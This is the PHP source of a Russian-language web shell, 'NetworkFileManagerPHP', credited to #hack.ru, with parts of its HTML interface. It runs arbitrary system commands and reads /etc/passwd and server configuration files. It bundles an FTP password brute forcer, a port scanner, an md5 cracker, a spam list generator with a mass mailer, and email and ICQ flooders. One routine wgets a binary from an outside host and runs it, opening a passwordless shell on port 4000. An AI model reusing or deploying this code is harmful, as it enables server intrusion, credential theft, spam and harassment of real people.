error_reporting(5); /* $use_md5=0; // криптовать пароль по md5 или нет? // $uname="nfm"; $upass="q1w2e3"; if (isset($PHP_AUTH_USER) && ($PHP_AUTH_USER==$uname)) { if ($use_md5) { if (md5($PHP_AUTH_PW) != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; } } else { if ($PHP_AUTH_PW != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; } } } else { Header('WWW-Authenticate: Basic realm="'.$title.'"'); Header('HTTP/1.0 401 Unauthorized'); exit; } */ if ($action != "download" && $action != "view" ): ?> /* Ваше мыло для отправки файлов, укажите свое*/ $demail ="ваше мыло"; /* пошёл конфиг */ $title="NetworkFileManagerPHP"; $ver="1.8.private (beta)"; $sob="Cобственность channel #hack.ru"; $id="0000001"; /* FTP-брут */ $filename="/etc/passwd"; $ftp_server="localhost"; /* сканер портов */ $min="1"; $max="65535"; /* Алиасы */ $aliases=array( /* поиск на сервере всех файлов с suid битом */ 'find / -type f -perm -04000 -ls' => 'find all suid files' , /* поиск на сервере всех файлов с sgid битом */ 'find / -type f -perm -02000 -ls' => 'find all sgid files', /* поиск на сервере файлов config.inc.php */ 'find / -type f -name config.inc.php' => 'find config.inc.php files', /* поиск на сервере всех директорий и файлов доступных на запись для всех */ 'find / -perm -2 -ls' => 'find writable directories and files', 'ls -la' => '---------------------------------------------------------', 'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password' ); /* Порты с наименованиями */ $port[1] = "tcpmux (TCP Port Service Multiplexer)"; $port[2] = "Management Utility"; $port[3] = "Compression Process"; $port[5] = "rje (Remote Job Entry)"; $port[7] = "echo"; $port[9] = "discard"; $port[11] = "systat"; $port[13] = "daytime"; $port[15] = "netstat"; $port[17] = "quote of the day"; $port[18] = "send/rwp"; $port[19] = "character generator"; $port[20] = "ftp-data"; $port[21] = "ftp"; $port[22] = "ssh, pcAnywhere"; $port[23] = "Telnet"; $port[25] = "SMTP (Simple Mail Transfer)"; $port[27] = "ETRN (NSW User System FE)"; $port[29] = "MSG ICP"; $port[31] = "MSG Authentication"; $port[33] = "dsp (Display Support Protocol)"; $port[37] = "time"; $port[38] = "RAP (Route Access Protocol)"; $port[39] = "rlp (Resource Location Protocol)"; $port[41] = "Graphics"; $port[42] = "nameserv, WINS"; $port[43] = "whois, nickname"; $port[44] = "MPM FLAGS Protocol"; $port[45] = "Message Processing Module [recv]"; $port[46] = "MPM [default send]"; $port[47] = "NI FTP"; $port[48] = "Digital Audit Daemon"; $port[49] = "TACACS, Login Host Protocol"; $port[50] = "RMCP, re-mail-ck"; $port[53] = "DNS"; $port[57] = "MTP (any private terminal access)"; $port[59] = "NFILE"; $port[60] = "Unassigned"; $port[61] = "NI MAIL"; $port[62] = "ACA Services"; $port[63] = "whois++"; $port[64] = "Communications Integrator (CI)"; $port[65] = "TACACS-Database Service"; $port[66] = "Oracle SQL*NET"; $port[67] = "bootps (Bootstrap Protocol Server)"; $port[68] = "bootpd/dhcp (Bootstrap Protocol Client)"; $port[69] = "Trivial File Transfer Protocol (tftp)"; $port[70] = "Gopher"; $port[71] = "Remote Job Service"; $port[72] = "Remote Job Service"; $port[73] = "Remote Job Service"; $port[74] = "Remote Job Service"; $port[75] = "any private dial out service"; $port[76] = "Distributed External Object Store"; $port[77] = "any private RJE service"; $port[78] = "vettcp"; $port[79] = "finger"; $port[80] = "World Wide Web HTTP"; $port[81] = "HOSTS2 Name Serve"; $port[82] = "XFER Utility"; $port[83] = "MIT ML Device"; $port[84] = "Common Trace Facility"; $port[85] = "MIT ML Device"; $port[86] = "Micro Focus Cobol"; $port[87] = "any private terminal link"; $port[88] = "Kerberos, WWW"; $port[89] = "SU/MIT Telnet Gateway"; $port[90] = "DNSIX Securit Attribute Token Map"; $port[91] = "MIT Dover Spooler"; $port[92] = "Network Printing Protocol"; $port[93] = "Device Control Protocol"; $port[94] = "Tivoli Object Dispatcher"; $port[95] = "supdup"; $port[96] = "DIXIE"; $port[98] = "linuxconf"; $port[99] = "Metagram Relay"; $port[100] = "[unauthorized use]"; $port[101] = "HOSTNAME"; $port[102] = "ISO, X.400, ITOT"; $port[103] = "Genesis Point-to㝀ƭoi Tnset"; $port[104] = "ACR-NEMA Digital Imag. & Comm. 300"; $port[105] = "CCSO name server protocol"; $port[106] = "poppassd"; $port[107] = "Remote Telnet Service"; $port[108] = "SNA Gateway Access Server"; $port[109] = "POP2"; $port[110] = "POP3"; $port[111] = "Sun RPC Portmapper"; $port[112] = "McIDAS Data Transmission Protocol"; $port[113] = "Authentication Service"; $port[115] = "sftp (Simple File Transfer Protocol)"; $port[116] = "ANSA REX Notify"; $port[117] = "UUCP Path Service"; $port[118] = "SQL Services"; $port[119] = "NNTP"; $port[120] = "CFDP"; $port[123] = "NTP"; $port[124] = "SecureID"; $port[129] = "PWDGEN"; $port[133] = "statsrv"; $port[135] = "loc-srv/epmap"; $port[137] = "netbios-ns"; $port[138] = "netbios-dgm (UDP)"; $port[139] = "NetBIOS"; $port[143] = "IMAP"; $port[144] = "NewS"; $port[150] = "SQL-NET"; $port[152] = "BFTP"; $port[153] = "SGMP"; $port[156] = "SQL Service"; $port[161] = "SNMP"; $port[175] = "vmnet"; $port[177] = "XDMCP"; $port[178] = "NextStep Window Server"; $port[179] = "BGP"; $port[180] = "SLmail admin"; $port[199] = "smux"; $port[210] = "Z39.50"; $port[213] = "IPX"; $port[218] = "MPP"; $port[220] = "IMAP3"; $port[256] = "RAP"; $port[257] = "Secure Electronic Transaction"; $port[258] = "Yak Winsock Personal Chat"; $port[259] = "ESRO"; $port[264] = "FW1_topo"; $port[311] = "Apple WebAdmin"; $port[350] = "MATIP type A"; $port[351] = "MATIP type B"; $port[363] = "RSVP tunnel"; $port[366] = "ODMR (On-Demand Mail Relay)"; $port[371] = "Clearcase"; $port[387] = "AURP (AppleTalk Update-Based Routing Protocol)"; $port[389] = "LDAP"; $port[407] = "Timbuktu"; $port[427] = "Server Location"; $port[434] = "Mobile IP"; $port[443] = "ssl"; $port[444] = "snpp, Simple Network Paging Protocol"; $port[445] = "SMB"; $port[458] = "QuickTime TV/Conferencing"; $port[468] = "Photuris"; $port[475] = "tcpnethaspsrv"; $port[500] = "ISAKMP, pluto"; $port[511] = "mynet-as"; $port[512] = "biff, rexec"; $port[513] = "who, rlogin"; $port[514] = "syslog, rsh"; $port[515] = "lp, lpr, line printer"; $port[517] = "talk"; $port[520] = "RIP (Routing Information Protocol)"; $port[521] = "RIPng"; $port[522] = "ULS"; $port[531] = "IRC"; $port[543] = "KLogin, AppleShare over IP"; $port[545] = "QuickTime"; $port[548] = "AFP"; $port[554] = "Real Time Streaming Protocol"; $port[555] = "phAse Zero"; $port[563] = "NNTP over SSL"; $port[575] = "VEMMI"; $port[581] = "Bundle Discovery Protocol"; $port[593] = "MS-RPC"; $port[608] = "SIFT/UFT"; $port[626] = "Apple ASIA"; $port[631] = "IPP (Internet Printing Protocol)"; $port[635] = "RLZ DBase"; $port[636] = "sldap"; $port[642] = "EMSD"; $port[648] = "RRP (NSI Registry Registrar Protocol)"; $port[655] = "tinc"; $port[660] = "Apple MacOS Server Admin"; $port[666] = "Doom"; $port[674] = "ACAP"; $port[687] = "AppleShare IP Registry"; $port[700] = "buddyphone"; $port[705] = "AgentX for SNMP"; $port[901] = "swat, realsecure"; $port[993] = "s-imap"; $port[995] = "s-pop"; $port[1024] = "Reserved"; $port[1025] = "network blackjack"; $port[1062] = "Veracity"; $port[1080] = "SOCKS"; $port[1085] = "WebObjects"; $port[1227] = "DNS2Go"; $port[1243] = "SubSeven"; $port[1338] = "Millennium Worm"; $port[1352] = "Lotus Notes"; $port[1381] = "Apple Network License Manager"; $port[1417] = "Timbuktu Service 1 Port"; $port[1418] = "Timbuktu Service 2 Port"; $port[1419] = "Timbuktu Service 3 Port"; $port[1420] = "Timbuktu Service 4 Port"; $port[1433] = "Microsoft SQL Server"; $port[1434] = "Microsoft SQL Monitor"; $port[1477] = "ms-sna-server"; $port[1478] = "ms-sna-base"; $port[1490] = "insitu-conf"; $port[1494] = "Citrix ICA Protocol"; $port[1498] = "Watcom-SQL"; $port[1500] = "VLSI License Manager"; $port[1503] = "T.120"; $port[1521] = "Oracle SQL"; $port[1522] = "Ricardo North America License Manager"; $port[1524] = "ingres"; $port[1525] = "prospero"; $port[1526] = "prospero"; $port[1527] = "tlisrv"; $port[1529] = "oracle"; $port[1547] = "laplink"; $port[1604] = "Citrix ICA, MS Terminal Server"; $port[1645] = "RADIUS Authentication"; $port[1646] = "RADIUS Accounting"; $port[1680] = "Carbon Copy"; $port[1701] = "L2TP/LSF"; $port[1717] = "Convoy"; $port[1720] = "H.323/Q.931"; $port[1723] = "PPTP control port"; $port[1731] = "MSICCP"; $port[1755] = "Windows Media .asf"; $port[1758] = "TFTP multicast"; $port[1761] = "cft-0"; $port[1762] = "cft-1"; $port[1763] = "cft-2"; $port[1764] = "cft-3"; $port[1765] = "cft-4"; $port[1766] = "cft-5"; $port[1767] = "cft-6"; $port[1808] = "Oracle-VP2"; $port[1812] = "RADIUS server"; $port[1813] = "RADIUS accounting"; $port[1818] = "ETFTP"; $port[1973] = "DLSw DCAP/DRAP"; $port[1985] = "HSRP"; $port[1999] = "Cisco AUTH"; $port[2001] = "glimpse"; $port[2049] = "NFS"; $port[2064] = "distributed.net"; $port[2065] = "DLSw"; $port[2066] = "DLSw"; $port[2106] = "MZAP"; $port[2140] = "DeepThroat"; $port[2301] = "Compaq Insight Management Web Agents"; $port[2327] = "Netscape Conference"; $port[2336] = "Apple UG Control"; $port[2427] = "MGCP gateway"; $port[2504] = "WLBS"; $port[2535] = "MADCAP"; $port[2543] = "sip"; $port[2592] = "netrek"; $port[2727] = "MGCP call agent"; $port[2628] = "DICT"; $port[2998] = "ISS Real Secure Console Service Port"; $port[3000] = "Firstclass"; $port[3001] = "Redwood Broker"; $port[3031] = "Apple AgentVU"; $port[3128] = "squid"; $port[3130] = "ICP"; $port[3150] = "DeepThroat"; $port[3264] = "ccmail"; $port[3283] = "Apple NetAssitant"; $port[3288] = "COPS"; $port[3305] = "ODETTE"; $port[3306] = "mySQL"; $port[3389] = "RDP Protocol (Terminal Server)"; $port[3521] = "netrek"; $port[4000] = "icq, command-n-conquer and shell nfm"; $port[4321] = "rwhois"; $port[4333] = "mSQL"; $port[4444] = "KRB524"; $port[4827] = "HTCP"; $port[5002] = "radio free ethernet"; $port[5004] = "RTP"; $port[5005] = "RTP"; $port[5010] = "Yahoo! Messenger"; $port[5050] = "multimedia conference control tool"; $port[5060] = "SIP"; $port[5150] = "Ascend Tunnel Management Protocol"; $port[5190] = "AIM"; $port[5500] = "securid"; $port[5501] = "securidprop"; $port[5423] = "Apple VirtualUser"; $port[5555] = "Personal Agent"; $port[5631] = "PCAnywhere data"; $port[5632] = "PCAnywhere"; $port[5678] = "Remote Replication Agent Connection"; $port[5800] = "VNC"; $port[5801] = "VNC"; $port[5900] = "VNC"; $port[5901] = "VNC"; $port[6000] = "X Windows"; $port[6112] = "BattleNet"; $port[6502] = "Netscape Conference"; $port[6667] = "IRC"; $port[6670] = "VocalTec Internet Phone, DeepThroat"; $port[6699] = "napster"; $port[6776] = "Sub7"; $port[6970] = "RTP"; $port[7007] = "MSBD, Windows Media encoder"; $port[7070] = "RealServer/QuickTime"; $port[7777] = "cbt"; $port[7778] = "Unreal"; $port[7648] = "CU-SeeMe"; $port[7649] = "CU-SeeMe"; $port[8000] = "iRDMI/Shoutcast Server"; $port[8010] = "WinGate 2.1"; $port[8080] = "HTTP"; $port[8181] = "HTTP"; $port[8383] = "IMail WWW"; $port[8875] = "napster"; $port[8888] = "napster"; $port[8889] = "Desktop Data TCP 1"; $port[8890] = "Desktop Data TCP 2"; $port[8891] = "Desktop Data TCP 3: NESS application"; $port[8892] = "Desktop Data TCP 4: FARM product"; $port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application"; $port[8894] = "Desktop Data TCP 6: COAL application"; $port[9000] = "CSlistener"; $port[10008] = "cheese worm"; $port[11371] = "PGP 5 Keyserver"; $port[13223] = "PowWow"; $port[13224] = "PowWow"; $port[14237] = "Palm"; $port[14238] = "Palm"; $port[18888] = "LiquidAudio"; $port[21157] = "Activision"; $port[22555] = "Vocaltec Web Conference"; $port[23213] = "PowWow"; $port[23214] = "PowWow"; $port[23456] = "EvilFTP"; $port[26000] = "Quake"; $port[27001] = "QuakeWorld"; $port[27010] = "Half-Life"; $port[27015] = "Half-Life"; $port[27960] = "QuakeIII"; $port[30029] = "AOL Admin"; $port[31337] = "Back Orifice"; $port[32777] = "rpc.walld"; $port[45000] = "Cisco NetRanger postofficed"; $port[32773] = "rpc bserverd"; $port[32776] = "rpc.spray"; $port[32779] = "rpc.cmsd"; $port[38036] = "timestep"; $port[40193] = "Novell"; $port[41524] = "arcserve discovery"; /* опции кончились, пошёл дизайн */ $meta = ""; $style=<< style; /* стили таблиц */ $style1=<<
Вопросы по скрипту NetworkFileManagerPHP |
NetworkFileManagerPHP (© #hack.ru) Версия: $ver | |||||
Скрипт для администрирования своего сайта и не только... | |||||
Помощь по скрипту: | .:Home | .:#hack.ru | .:Вопросы | .:Описание | .:Обновления |
Сетевой софт: | .:Скан портов | .:Брутер ФТП | .:Архивация папок | .:Дамп Mysql | .:Удалить NFM |
Доступ к эксплойтам: | .:открыть шел | .:Explots | |||
Хакерский софт: | .:Шифровка | .:Расшифровка | .:Full access FTP | .:Спамер | .:Удаленная загрузка | Софт наказания: | .:Флуд Email | .:Флуд ICQ |
$sob ID:$id | |||||
.:etc/passwd | .:cpanel log | .:httpd.conf[1] | .:httpd.conf[2] | .:Bugtraq |
Текущая директория: "); for ($i = 0;$i<=$j;$i++) print("$gsub[$i]"); $free = tinhbyte(diskfreespace("./")); print(" |
Доступное дисковое пространство : $free |
".exec("uname -a")." |
Ваш IP: $REMOTE_ADDR $HTTP_X_FORWARDED_FOR |
Инфа о железе:(GHz) ".exec("cat /proc/cpuinfo | grep GHz")." |
Инфа о железе:(MHz) ".exec("cat /proc/cpuinfo | grep MHz")." |
".exec("id")." |
Нет доступа. |
Имя | Размер | Дата создания | Тип | Права доступа | Комментарии |
Только чтение | Архивация папки |
$name | $size | $time | $type | $perm | $action |
Редактировать | Удалить |
$files[$i] | $size | $time | $type | $perm | $act |
Путь до Файла:$fullpath |
Спасибо!!!Файл $file отправлен вам на $demail. |
Путь: "); for ($i = 0;$i<=$j;$i++) print("$gsub[$i]"); print(" |
Дериктория $fullpath ".exec("tar -zc $fullpath -f $pass.tar.gz")."упакована в файл $pass.tar.gz |
Загрузка файлов |
Частенько случается, что на серверах где установлен NFM не работает wget, а файл загрузить ой как хочется, таким образом с помощью простых функций вы сможете загрузить любой файл на свой хостинг в папку, где залит NFM либо другую какую вы выберете (см.Путь).( работает не на всех хостингах) |
Вопросы и пожелания по скрипту NetworkFileManagerPHP |
В процессе работы со скриптом NFM у вас могут возникнуть вопросы и новые предложения по улучшению или добавлению функций в NFM, все ваши предложения будут рассмотрены и будут реализованы в дальнейших версиях NFM. |
Уникальный спамер |
Теперь вам не нужно покупать спамлисты, NFM сам в состоянии сгенерить любую базу, валидность которой будет 50-60% |
Сгенеренно всего $chislo email. |
"; echo " |
Удаление NFM |
Отправка писем с задаными опциями |
Открываем файл \"".$address."\" ... |
Файл \"".$address."\" найден... |
Файл \"".$address."\" открыт для чтения... |
Файл \"".$address."\" не могу открыть для чтения... |
Начинаем чтение из файла \"".$address."\" ... |
Отправляем письмо на \"".$recipient."\"...отправлено "; if(@mail($recipient, stripslashes($subject), stripslashes($header))) { $counter = $counter + 1; echo "[\"".$counter."\"] ".date("H:i:s")." |
Отправляем письмо на \"".$otvet."\" для проверки"; $subject = "".$subject; if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) { $counter = $counter + 1; echo " отправлено... [\"".$counter."\"] ".date("H:i:s")." |
Файл \"".$address."\" успешно закрыт! |
Файл \"".$address."\" не могу закрыть! |
$status2 |
Описание скрипта NetworkFileManagerPHP |
|
FTP-server: $ftp_server |
Connected with login:password - ".$g[1].":".$g[1]." |
".$g[1].":".$g[1]." - failed |
Архивация данных |
В связи с различными настройками серверов, я не стал полностью автоматизировать скрипт под каждый сервер. Вам только останется подправить точные пути к папке домена и нажать на ввод, все данные расположенные в выбранной папке заархивируются в архив tar.gz. |
Установка шела |
Данный шел устанавливается на 4000 порт, доступ без пароля по телнет соединению |
Данные по шелу записаны в файл s |
".exec("wget http://vzlomanet.x25.net.ru/adm/exploits/bash/s")." Cкачиваем... |
".exec("chmod 777 s")." Устанавливаем права... |
".exec("./s")." Запускаем...на 4000 порт |
".exec("rm s")." Удаляем s... |
Флудер Email |
Так уж получилось, что работая в интернете, мы частенько нарываемся на мошенников или нас подставляют. Но если мы имеем мыло обидчика, то мы можем ему подговнить житие. Для этих целей и писалась данная опция. С помощью этой опции вы сможете зафлудить негодяя!!! |
Криптование данных |
На данный момент в интернете существует огоромное колличество программ и скриптов, которые используют различные методы шифрования паролей, с помощью NFM вы можете получить доступ к изменению этих данных, но бывает нужным изменить данные на свои, для этого я выбрал самые популярные методы шифрования. |
Декодирование данных |
Всем известно, что md5 нельзя мгновенно декодировать, так как используется однонаправленное шифрование (алгоритм хэширования), создающее уникальный отпечаток исходный строки, а именно 128-битовый (md5). В настоящее время считается невозможным по этому отпечатку востановить исходные данные, обратив процедуру, я же попробую применить метод «грубой силы», а именно полный перебор до совпадения входных и выходных данных. |
Результат выполнения перебора паролей: | |
Захешированный пароль: | $word |
Начало перебора: | $dat - $date |
Окончание перебора: | $dat2 - $date2 |
Выполнение перебора хешей записан в файл: ".$word."_md5 |
Брутфорсер ФТП |
С помощью данного брутфорсера вы сможете подобрать пароль к любому хостингу без проблем, чтобы было что перебирать я добавил базу паролей, которая генерируется на лету ( не пишите большие цифры в колличестве паролей так как это серьезная нагрузка на сервер 10000 вполне хватит) . |
Не верно указано фтп хостинга!!! На $host закрыт 21 порт |
Результаты сканирования: $id |
Сканируем хостинг на наличие открытых портов" . "... |
Port:$porta / $serv | $port_addres | (Что это?) |
На данном хостинге нет открытых портов |
"; $footer=" | ||
Файл | Размер | |||
".$val." | "; $fz_tmp=filesize($val); if ($fcut && ($fz_tmp > $max_sql)) { echo " | ".$fz_tmp." Octets | ".$fz_tmp." байт | "; } echo " |
|
||
Нет доступа к дериктории, смотри CHMOD. |
"; echo system($cm); echo " |
Не могу загружать файлы в этой дериктории |
Не могу создать папку в этой дериктории |